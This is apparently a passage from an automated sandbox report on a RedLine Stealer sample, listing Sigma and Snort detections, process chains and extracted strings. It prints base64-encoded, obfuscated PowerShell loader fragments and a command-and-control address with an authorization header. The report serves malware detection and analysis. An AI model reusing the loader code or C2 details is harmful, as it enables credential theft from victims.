ZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIs
                          Sigma detected: WScript or CScript Dropper
                          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "wscript.exe" "C:\Users\user\start.vbs", CommandLine: "wscript.exe" "C:\Users\user\start.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\f6FauZ2CEz.exe", ParentImage: C:\Users\user\Desktop\f6FauZ2CEz.exe, ParentProcessId: 6696, ParentProcessName: f6FauZ2CEz.exe, ProcessCommandLine: "wscript.exe" "C:\Users\user\start.vbs", ProcessId: 4928, ProcessName: wscript.exe
                          Sigma detected: Change PowerShell Policies to an Insecure Level
                          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1", CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5728, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1", ProcessId: 7184, ProcessName: powershell.exe
                          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                          Source: Process startedAuthor: Michael Haag: Data: Command: "wscript.exe" "C:\Users\user\start.vbs", CommandLine: "wscript.exe" "C:\Users\user\start.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\f6FauZ2CEz.exe", ParentImage: C:\Users\user\Desktop\f6FauZ2CEz.exe, ParentProcessId: 6696, ParentProcessName: f6FauZ2CEz.exe, ProcessCommandLine: "wscript.exe" "C:\Users\user\start.vbs", ProcessId: 4928, ProcessName: wscript.exe
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIs
                          Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1188, TargetFilename: C:\Users\user\QJHJap.ps1

                          Snort Signatures

                          Timestamp:04/26/24-02:42:01.151356
                          SID:2046045
                          Source Port:49730
                          Destination Port:18418
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/26/24-02:42:15.800330
                          SID:2043231
                          Source Port:49730
                          Destination Port:18418
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/26/24-02:42:01.413026
                          SID:2043234
                          Source Port:18418
                          Destination Port:49730
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/26/24-02:42:06.716638
                          SID:2046056
                          Source Port:18418
                          Destination Port:49730
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for URL or domain
                          Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                          Found malware configuration
                          Source: 00000005.00000002.1719342950.0000000006DDA000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "5.42.92.179:18418", "Authorization Header": "bd91fb2c760240811ff8b4d73e01e2d2"}
                          Multi AV Scanner detection for submitted file
                          Source: f6FauZ2CEz.exeVirustotal: Detection: 9%Perma Link
                          Source: f6FauZ2CEz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          Source: f6FauZ2CEz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4

                          Software Vulnerabilities

                          barindex
                          Suspicious execution chain found
                          Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                          Networking

                          barindex
                          Snort IDS alert for network traffic
                          Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49730 -> 5.42.92.179:18418
                          Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49730 -> 5.42.92.179:18418
                          Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 5.42.92.179:18418 -> 192.168.2.4:49730
                          Source: TrafficSnort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 5.42.92.179:18418 -> 192.168.2.4:49730
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: 5.42.92.179:18418
                          Source: global trafficTCP traffic: 192.168.2.4:49730 -> 5.42.92.179:18418
                          Source: Joe Sandbox ViewASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.179
                          Source: powershell.exe, 00000005.00000002.1734103299.0000000007B9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                          Source: f6FauZ2CEz.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                          Source: powershell.exe, 00000004.00000002.1650352774.0000000005EEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1719342950.00000000063CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 00000005.00000002.1713760985.00000000054B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
